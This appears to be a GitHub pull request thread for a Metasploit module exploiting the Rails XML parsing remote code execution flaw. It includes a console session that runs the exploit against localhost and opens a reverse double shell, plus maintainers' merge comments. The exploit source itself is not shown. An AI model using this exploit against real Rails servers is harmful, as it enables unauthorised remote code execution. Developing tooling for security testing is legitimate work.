For no reason other than to beat you to it ;)
(hdmoore claimed they were pushing their own module in a couple hours' time)
Tested with Ruby 1.9.3 on Rails 3.2.10. Can probably be made to work on older Ruby+Rails versions; in particular, using Gem::Requirement restricts it to 1.9.?.
A variation of @benmmurphy's payload is used, which he may or may not be comfortable with. I figure it's not too difficult to come up with independently and my/@charliesome's hack would just be replaced by something similar eventually.
msf > use exploits/unix/webapp/rails_xml_parsing_exec
msf exploit(rails_xml_parsing_exec) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(rails_xml_parsing_exec) > exploit
[*] Started reverse double handler
[*] Sent exploit request
[*] Accepted the first client connection...
[*] Accepted the second client connection...
Rails RCE with hacky payload
Thanks! Closing this out and will merge your work into the module in progress that uses ARCH_RUBY payloads
haha this is going to be a shitshow...
See #1282 for the merged version of this module
incoming shitstorm expected :)